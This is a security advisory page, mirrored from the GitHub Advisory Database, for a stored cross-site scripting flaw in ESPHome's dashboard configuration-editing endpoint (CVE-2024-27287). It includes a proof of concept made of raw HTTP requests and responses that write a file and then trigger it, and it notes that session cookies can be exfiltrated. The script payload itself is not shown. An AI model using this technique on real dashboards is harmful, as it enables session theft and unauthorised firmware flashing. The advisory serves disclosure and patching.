Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS05cDQzLWhqNWotOTZoNc4AA5zH
esphome vulnerable to stored Cross-site Scripting in edit configuration file API
Summary
Edit configuration file API in dashboard component of ESPHome version 2023.12.9 (command line installation and Home Assistant add-on) serves unsanitized data with “Content-Type: text/html; charset=UTF-8”, allowing remote authenticated user to inject arbitrary web script and exfiltrate session cookies via Cross-Site scripting (XSS).
Credits
Spike Reply Cybersecurity Teams
Details
It is possible for a malicious authenticated user to inject arbitrary Javascript in configuration files using a POST request to the /edit endpoint, the configuration parameter allows to specify the file to write.
To trigger the XSS vulnerability, the victim must visit the page /edit?configuration=[xss file].
PoC
To reproduce the issue, it is possible to perform a POST request to inject the payload:
request:
POST /edit?configuration=xss.yaml HTTP/1.1
Host: localhost:6052
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:6052/
Connection: close
Cookie: authenticated=[replace with valid cookie]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 40
response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Nov 2023 11:02:27 GMT
Content-Length: 0
Connection: close
And subsequently trigger the XSS with a GET request to the same endpoint:
request:
GET /edit?configuration=xss.yaml HTTP/1.1
Host: localhost:6052
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:6052/
Connection: close
Cookie: authenticated=2|1:0|10:1701341719|13:authenticated|4:eWVz|0907127d7274094cc5a2490b95becf5c11fd52b8c3ee3655d65fe9fda099108c
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0
response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Nov 2023 11:04:12 GMT
Etag: "ec6c9889f5c9a6c8e9d2d5e4ce1b1a85e6e7da2b"
Content-Length: 40
Connection: close
Impact
Abusing this vulnerability a malicious actor could perform operations on the dashboard on the behalf of a logged user, access sensitive information, create, edit and delete configuration files and flash firmware on managed boards.
In addition to this, cookies are not correctly secured, allowing the exfiltration of session cookie values.
Credits
Spike Reply Cybersecurity Team
Permalink: https://github.com/advisories/GHSA-9p43-hj5j-96h5JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cDQzLWhqNWotOTZoNc4AA5zH
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 months ago
Updated: about 2 months ago
CVSS Score: 6.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
Identifiers: GHSA-9p43-hj5j-96h5, CVE-2024-27287
References:
- https://github.com/esphome/esphome/security/advisories/GHSA-9p43-hj5j-96h5
- https://github.com/esphome/esphome/commit/37d2b3c7977a4ccbec59726ca7549cb776661455
- https://github.com/advisories/GHSA-9p43-hj5j-96h5
Blast Radius: 11.4
Affected Packages
pypi:esphome
Dependent packages: 0Dependent repositories: 56
Downloads: 27,802 last month
Affected Version Ranges: >= 2023.12.9, < 2024.2.2
Fixed in: 2024.2.2
All affected versions: 2023.12.9, 2024.2.0, 2024.2.1
All unaffected versions: 1.10.1, 1.11.0, 1.11.1, 1.11.2, 1.12.0, 1.12.1, 1.12.2, 1.13.0, 1.13.1, 1.13.2, 1.13.3, 1.13.4, 1.13.5, 1.13.6, 1.14.0, 1.14.1, 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.15.0, 1.15.1, 1.15.2, 1.15.3, 1.16.0, 1.16.1, 1.16.2, 1.17.0, 1.17.1, 1.17.2, 1.18.0, 1.19.0, 1.19.1, 1.19.2, 1.19.3, 1.19.4, 1.20.0, 1.20.1, 1.20.2, 1.20.3, 1.20.4, 2021.8.0, 2021.8.1, 2021.8.2, 2021.9.0, 2021.9.1, 2021.9.2, 2021.9.3, 2021.10.0, 2021.10.1, 2021.10.2, 2021.10.3, 2021.11.0, 2021.11.1, 2021.11.2, 2021.11.3, 2021.11.4, 2021.12.0, 2021.12.1, 2021.12.2, 2021.12.3, 2022.1.0, 2022.1.1, 2022.1.2, 2022.1.3, 2022.1.4, 2022.2.0, 2022.2.1, 2022.2.2, 2022.2.3, 2022.2.4, 2022.2.5, 2022.2.6, 2022.3.0, 2022.3.1, 2022.3.2, 2022.4.0, 2022.5.0, 2022.5.1, 2022.6.0, 2022.6.1, 2022.6.2, 2022.6.3, 2022.8.0, 2022.8.1, 2022.8.2, 2022.8.3, 2022.9.0, 2022.9.1, 2022.9.2, 2022.9.3, 2022.9.4, 2022.10.0, 2022.10.1, 2022.10.2, 2022.11.0, 2022.11.1, 2022.11.2, 2022.11.3, 2022.11.4, 2022.11.5, 2022.12.0, 2022.12.1, 2022.12.2, 2022.12.3, 2022.12.4, 2022.12.5, 2022.12.6, 2022.12.7, 2022.12.8, 2023.2.0, 2023.2.1, 2023.2.2, 2023.2.3, 2023.2.4, 2023.3.0, 2023.3.1, 2023.3.2, 2023.4.0, 2023.4.1, 2023.4.2, 2023.4.3, 2023.4.4, 2023.5.0, 2023.5.1, 2023.5.2, 2023.5.3, 2023.5.4, 2023.5.5, 2023.6.0, 2023.6.1, 2023.6.2, 2023.6.3, 2023.6.4, 2023.6.5, 2023.7.0, 2023.7.1, 2023.8.0, 2023.8.1, 2023.8.2, 2023.8.3, 2023.9.0, 2023.9.1, 2023.9.2, 2023.9.3, 2023.10.0, 2023.10.1, 2023.10.2, 2023.10.3, 2023.10.4, 2023.10.5, 2023.10.6, 2023.11.0, 2023.11.1, 2023.11.2, 2023.11.3, 2023.11.4, 2023.11.5, 2023.11.6, 2023.12.0, 2023.12.1, 2023.12.2, 2023.12.3, 2023.12.4, 2023.12.5, 2023.12.6, 2023.12.7, 2023.12.8, 2024.2.2, 2024.3.0, 2024.3.1, 2024.3.2, 2024.4.0, 2024.4.1